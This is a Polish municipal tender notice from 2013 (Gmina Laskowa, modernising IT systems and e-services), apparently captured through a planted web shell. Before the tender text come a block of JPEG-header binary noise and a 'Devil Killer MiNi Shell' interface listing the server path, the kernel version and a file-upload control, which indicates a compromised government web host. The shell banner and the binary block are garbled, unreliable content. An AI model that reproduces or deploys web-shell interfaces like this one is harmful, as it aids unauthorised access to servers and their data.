JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131115/466546-N-2013.html

<p class="kh_header"><b>Laskowa: UDOSTĘPNIENIE e-USŁUG POPRZEZ ROZBUDOWĘ I MODERNIZACJĘ TELEINFORMATYCZNEGO SYSTEMU ZARZĄDZANIA, W TYM WDROŻENIE SEOD
W GMINIE LASKOWA</b><br>
<b>Numer ogłoszenia: 466546 - 2013; data zamieszczenia: 15.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Laskowa , Laskowa 643, 34-602 Laskowa, woj. małopolskie, tel. 018 333-30-76, faks 018 333-30-76.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.laskowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UDOSTĘPNIENIE e-USŁUG POPRZEZ ROZBUDOWĘ I MODERNIZACJĘ TELEINFORMATYCZNEGO SYSTEMU ZARZĄDZANIA, W TYM WDROŻENIE SEOD
W GMINIE LASKOWA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest udostępnienie e-usług poprzez rozbudowę i modernizację teleinformatycznego systemu zarządzania, w tym wdrożenie SEOD w Gminie Laskowa w skład którego wchodzą:

1) ETAP I - Zakup, instalacja, konfiguracja i uruchomienie infrastruktury sprzętowej oraz rozbudowa wyposażenie serwerowni zamawiającego.
2)ETAP II - Zakup,  instalacja,  oraz uruchomienie oprogramowania zintegrowanego Teleinformatycznego Systemu Zarządzania obejmującego:
3) Etap III - Wdrożenie zintegrowanego Teleinformatycznego Systemu Zarządzania poprzez realizację w szczególności:
4) ETAP IV - Migrację danych z obecnie używanych aplikacji do docelowych systemów zamawianych w niniejszym postępowaniu:

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8, 30.20.00.00-1, 48.61.00.00-7, 72.26.30.00-6, 80.53.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona weryfikacji w/w warunku na podstawie złożonego oświadczenia o spełnieniu warunków określonych w art. 22 ust 1 ustawy Prawo Zamówień Publicznych (wzór - załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że wykonali należycie przynajmniej:
1)dwa zamówienia dla każdego z poniższych obszarów:
a)dostawa, instalacja, konfiguracja, świadczenie usług gwarancyjnych i serwisowych infrastruktury sprzętowej o wartości, co najmniej 100 000,00 zł brutto każde;
b)dostawa i wdrożenie oferowanego przez Wykonawcę w niniejszym postępowaniu systemu informatycznego dziedzinowego (SD) wspomagającego zarządzanie jednostką administracji samorządowej, w obszarach, co najmniej takich jak: obsługa ewidencji ludności, księgowość budżetowa, księgowość podatkowa, kadry, płace, wymiar podatków (rolny, leśny, nieruchomości, środki transportu), zwrotu podatku akcyzowego zawartego w cenie oleju napędowego, ewidencji środków trwałych o wartości, co najmniej 200 000,00 zł brutto każde;
c)migracja danych z dotychczas posiadanych systemów dziedzinowych do oferowanego przez Wykonawcę w niniejszym postępowaniu systemu informatycznego dziedzinowego (SD) wspomagającego zarządzanie jednostką administracji samorządowej, w obszarach, co najmniej takich jak: ewidencja ludności, księgowość budżetowa, księgowość podatkowa, kadry, płace, wymiar podatków.
d)dostawa, wdrożenie, konfiguracja, parametryzacja, przeprowadzenie szkoleń i instruktaży przy stanowiskach oferowanego przez Wykonawcę w niniejszym postępowaniu systemu elektronicznego obiegu dokumentów (SEOD) wspomagającego zarządzanie jednostką administracji samorządowej dla, co najmniej 30 użytkowników wewnętrznych wraz z integracją z platformą ePUAP o wartości nie mniejszej niż 100 000,00 zł brutto każde;
e)dostawa i wdrożenie usług katalogowych Active Directory (AD);
f)Wdrożenie portalu interesanta i podatnika.
2)jedno zamówienie w zakresie, którego łącznie wykonano: 
dostawę i instalację infrastruktury sprzętowej, wdrożenie usług katalogowych Active Directory oraz oferowanych przez Wykonawcę w niniejszym postępowaniu: systemu informatycznego dziedzinowego (SD) wspomagającego zarządzanie jednostką administracji samorządowej oraz systemu elektronicznego obiegu dokumentów (SEOD) wspomagającego zarządzanie jednostką administracji samorządowej zintegrowanego z platformą ePUAP wraz z integracją pomiędzy tymi systemami (SD i SEOD).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje, co najmniej:
1)1 osobą, która pełnić będzie rolę kierownika projektu, posiadającą wykształcenie wyższe oraz minimum 5 letnie doświadczenie zawodowe w zarządzaniu realizacją projektów informatycznych wg metodyki Prince2 lub innej równoważnej, oraz posiadająca znajomość najlepszych praktyk w zakresie zarządzania projektami - potwierdzoną certyfikatem wydany przez niezależną jednostkę akredytowaną do wydawania tego typu certyfikatów, potwierdzającym posiadaną wiedzę z zakresu metodyki zarządzania projektami Prince2 lub innej równoważnej, co najmniej na poziomie wyższym niż podstawowy. Osoba ta musi posiadać doświadczenie w zarządzaniu projektami informatycznymi potwierdzone udziałem proponowanego specjalisty na stanowisku kierownika projektu w przynajmniej 1 zakończonym sukcesem (tj. odebranym przez Zamawiającego) projekcie polegającym na wdrożeniu lub dostawie i wdrożeniu w jednostce administracji samorządowej infrastruktury sprzętowej oraz oferowanych w niniejszym postępowaniu zintegrowanych ze sobą systemów: systemu dziedzinowego (SD) oraz systemu elektronicznego obiegu dokumentów (SEOD) o wartości nie mniejszej niż 400 000,00 zł brutto.
2)1 osobą, która pełnić będzie rolę zastępcy kierownika projektu, posiadającą wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe w zarządzaniu realizacją projektów informatycznych. Osoba ta musi posiadać doświadczenie w zarządzaniu projektami informatycznymi potwierdzone udziałem proponowanego specjalisty na stanowisku kierownika projektu lub zastępcy kierownika projektu w przynajmniej 1 zakończonym sukcesem (tj. odebranym przez Zamawiającego) projekcie polegającym na wdrożeniu lub dostawie i wdrożeniu w jednostce administracji samorządowej infrastruktury sprzętowej oraz oferowanych w niniejszym postępowaniu zintegrowanych ze sobą systemów: systemu dziedzinowego (SD) oraz systemu elektronicznego obiegu dokumentów (SEOD) o wartości nie mniejszej niż 200 000,00 zł brutto.
3)2 specjalistami, osobami które pełnić będą rolę specjalistów ds. wdrożenia systemu elektronicznego obiegu dokumentów (SEOD), posiadające wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe w zakresie wdrażania w jednostkach administracji samorządowej systemów elektronicznego obiegu dokumentów (SEOD). Każdy z proponowanych specjalistów, musi posiadać doświadczenie na stanowisku wdrożeniowca systemu elektronicznego obiegu dokumentów (SEOD), potwierdzone udziałem proponowanego specjalisty na stanowisku wdrożeniowca systemu elektronicznego obiegu dokumentów (SEOD), w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach polegających na wdrożeniu w jednostce administracji samorządowej oferowanego w niniejszym postępowaniu przez Wykonawcę elektronicznego obiegu dokumentów (SEOD), a proponowani specjaliści musieli w nim wykonywać istotne zadanie merytoryczne.
4)1 specjalistą, osobą która pełnić będzie rolę specjalisty ds. wdrożenia usług Active Directory, posiadającą minimum 3 letnie doświadczenie zawodowe oraz wiedzę w zakresie wdrożenia i konfiguracji Active Directory potwierdzoną certyfikatem producenta oprogramowania na poziomie co najmniej MCTS w zakresie implementacji i konfiguracji Active Directory.
5)1 specjalistą, osobą która pełnić będzie rolę specjalisty ds. informacji niejawnych, posiadająca wykształcenie wyższe oraz minimum 3 letnie doświadczenie w zakresie zarządzania informacjami niejawnymi przy wdrażaniu w jednostkach administracji samorządowej systemów elektronicznego obiegu dokumentów (SEOD). Osoba ta musi posiadać doświadczenie na stanowisku specjalisty ds. informacji niejawnych potwierdzone udziałem proponowanego specjalisty na stanowisku specjalisty ds. informacji niejawnych w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach polegających na wdrożeniu w jednostce administracji samorządowej oferowanego w niniejszym postępowaniu przez Wykonawcę elektronicznego obiegu dokumentów (SEOD) oraz posiadająca aktualne poświadczenie bezpieczeństwa w zakresie dostępu do informacji niejawnych oznaczone klauzulą, co najmniej (poufne).
6)1 specjalistą, osobą która pełnić będzie rolę specjalisty ds. infrastruktury technicznej posiadająca wykształcenie wyższe techniczne oraz minimum 3 letnie doświadczenie w zakresie instalacji i konfiguracji infrastruktury sprzętowo technicznej, potwierdzone udziałem proponowanego specjalisty na stanowisku specjalisty ds. infrastruktury technicznej w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach polegających na dostawie i instalacji infrastruktury sprzętowo technicznej.
7)1 specjalistą, osobą która pełnić będzie rolę specjalisty ds. wdrożenia systemu dziedzinowego (SD) w obszarze Finanse i Księgowość, posiadającą wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe w zakresie wdrażania w jednostkach administracji samorządowej systemów dziedzinowych (SD) w obszarze Finanse i Księgowość. Osoba ta musi posiadać doświadczenie na stanowisku wdrożeniowca obszaru Finanse i Księgowość, potwierdzone udziałem proponowanego specjalisty na stanowisku wdrożeniowca systemu dziedzinowego (SD) w obszarze Finanse i Księgowość w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach polegających na wdrożeniu w jednostce administracji samorządowej oferowanego w niniejszym postępowaniu przez Wykonawcę systemu dziedzinowego (SD) w obszarze Finanse i Księgowość, a proponowany specjalista musiał w nim wykonywać istotne zadanie merytoryczne.
8)1 specjalistą, osobą która pełnić będzie rolę specjalisty ds. wdrożenia systemu dziedzinowego (SD) w obszarze Kadry i Płace, posiadającą wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe w zakresie wdrażania w jednostkach administracji samorządowej systemów dziedzinowych (SD) w obszarze Kadry i Płace. Osoba ta musi posiadać doświadczenie na stanowisku wdrożeniowca obszaru Kadry i Płace, potwierdzone udziałem proponowanego specjalisty na stanowisku wdrożeniowca systemu dziedzinowego (SD) w obszarze Kadry i Płace w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach polegających na wdrożeniu w jednostce administracji samorządowej oferowanego w niniejszym postępowaniu przez Wykonawcę systemu dziedzinowego (SD) w obszarze Kadry i Płace, a proponowany specjalista musiał w nim wykonywać istotne zadanie merytoryczne.
9)1 specjalistą, osobą którą pełnić będzie rolę specjalisty ds. wdrożenia systemu dziedzinowego (SD) w obszarze Podatków Gminnych, posiadającą wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe w zakresie wdrażania w jednostkach administracji samorządowej systemów dziedzinowych (SD) w obszarze Podatków Gminnych. Osoba ta musi posiadać doświadczenie na stanowisku wdrożeniowca obszaru Podatków Gminnych, potwierdzone udziałem proponowanego specjalisty na stanowisku wdrożeniowca systemu dziedzinowego (SD) w obszarze Podatków Gminnych, w przynajmniej 3 zakończonych sukcesem (tj. odebranych przez Zamawiającego) projektach polegających na wdrożeniu w jednostce administracji samorządowej oferowanego w niniejszym postępowaniu przez Wykonawcę systemu dziedzinowego (SD) w obszarze Podatków Gminnych, a proponowany specjalista musiał w nim wykonywać istotne zadanie merytoryczne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykonawca powinien udokumentować, że posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 400 000,00 zł (słownie: czterysta tysięcy złotych).
2)Wykonawca powinien udokumentować, że jest ubezpieczony od odpowiedzialności cywilnej na kwotę co najmniej 400 000,00 zł (słownie: czterysta tysięcy złotych), w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty-zał. nr 2 do SIWZ
Deklaracja posiadanych funkcjonalności z wykorzystaniem wzoru-zał. nr 7 do SIWZ
Projekt umowy-zał. nr 8 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony mogą zmienić istotne postanowienia umowy:
1)w przypadku konieczności zmian w zakresie przedmiotu i sposobu realizacji Umowy, w tym kolejności wykonania Etapów i składających się na nie poszczególnych czynności wdrożeniowych, nie spowodowanych działaniem lub zaniechaniem którejkolwiek ze Stron Umowy, o ile zmiana taka jest korzystna dla zamawiającego lub jest konieczna w celu prawidłowego wykonania umowy, w zakresie spowodowanym zmianą;
2)konieczności zmiany harmonogramu, terminów wykonania etapów lub terminu końcowego wykonania przedmiotu zamówienia w sytuacji, gdy z przyczyn związanych  z procedurą udzielania przedmiotowego zamówienia, umowa w sprawie  przedmiotowego zamówienia zostanie zawarta w terminie uniemożliwiającym realizację Umowy w pierwotnych terminach, także z powodu okoliczności, których nie można było przewidzieć w chwili podpisania umowy;
3)istnieje możliwość zastosowania nowszych i korzystniejszych dla zamawiającego rozwiązań technologicznych lub technicznych, niż te istniejące w chwili podpisania umowy;
4)jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, a w szczególności w przypadku ustawowej zmiany podatku VAT, w zakresie spowodowanym wprowadzeniem zmian;
Zmiana Umowy może nastąpić w przypadku wystąpienia siły wyższej w zakresie objętym skutkami działania siły wyższej.
1)Strony nie są odpowiedzialne za skutki wynikające z działania siły wyższej, które utrudniają lub uniemożliwiają pełne lub częściowe wykonanie Umowy. Za okoliczności siły wyższej mogą być uznane tylko te, które zaistniały niezależnie od woli Stron i nie występują z winy Strony powołującej się na siłę wyższą. Strona zobowiązana jest niezwłocznie powiadomić drugą stronę o wystąpieniu siły wyższej, uniemożliwiającej realizację obowiązków wynikających z Umowy.
zmiana może być inicjowana na wniosek zamawiającego lub wykonawcy, przy czym strona wnioskująca zobowiązana jest do szczegółowego uzasadnienia proponowanych zmian, 
zmiana musi uzyskać aprobatę obu stron, 
zmiana musi być zgodna z SIWZ oraz ustawą, w tym w szczególności: 
1)zmiana umowy nie może naruszać zasady zachowania uczciwej konkurencji oraz równego traktowania wykonawców, 
2)zmiana musi być wprowadzona w formie pisemnej pod rygorem nieważności, 
3)zmiana nie może spowodować wykroczenia usługi poza przedmiot zamówienia opisany w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.laskowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Laskowa
34 - 602 Laskowa 643.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2013 godzina 09:50, miejsce: Urząd Gminy Laskowa
34 - 602 Laskowa 643
Pokój nr 12 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest współfinansowane w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013.</p>
